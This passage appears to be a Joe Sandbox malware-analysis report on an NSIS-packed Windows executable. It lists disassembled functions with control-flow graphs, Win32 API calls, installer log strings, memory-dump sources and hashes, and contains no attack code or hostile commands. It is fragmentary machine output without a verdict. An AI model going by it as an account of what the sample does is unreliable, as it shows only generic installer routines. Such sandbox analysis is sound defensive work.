                                                                                              control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004033F1
                                                                                              • GetTickCount.KERNEL32 ref: 00403492
                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                              • wsprintfW.USER32 ref: 004034CE
                                                                                              • WriteFile.KERNELBASE(00000000,00000000,004241C1,00403792,00000000), ref: 004034FF
                                                                                              • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileTickWrite$wsprintf
                                                                                              • String ID: (]C$... %d%%$pAB
                                                                                              • API String ID: 651206458-3635341587
                                                                                              • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                              • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                              • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                              • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                              Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00445D80,004241C1,762323A0,00000000), ref: 00404FD6
                                                                                              • lstrlenW.KERNEL32(004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FE6
                                                                                              • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FF9
                                                                                              • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406902
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2740478559-0
                                                                                              • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                              • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                              • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                              • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                              Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                              APIs
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeGloballstrcpyn
                                                                                              • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                              • API String ID: 1459762280-1711415406
                                                                                              • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                              • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                              • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                              • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                              Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                              • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                              • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3376005127-0
                                                                                              • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                              • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                              • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                              • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                              Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                              • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                              • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2568930968-0
                                                                                              • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                              • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                              • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                              • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                              Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                              APIs
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWritelstrcpyn
                                                                                              • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                              • API String ID: 247603264-1827671502
                                                                                              • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                              • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                              • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                              • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                              Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                              APIs
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004241C1,762323A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                              • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                              • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                              • API String ID: 3156913733-2180253247
                                                                                              • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                              • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                              • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                              • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                              Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: nsa
                                                                                              • API String ID: 1716503409-2209301699
                                                                                              • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                              • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                              • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                              • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                              Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                              • String ID: HideWindow
                                                                                              • API String ID: 1249568736-780306582
                                                                                              • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                              • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                              • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                              • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                              Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                              • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                              • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                              • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                              Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
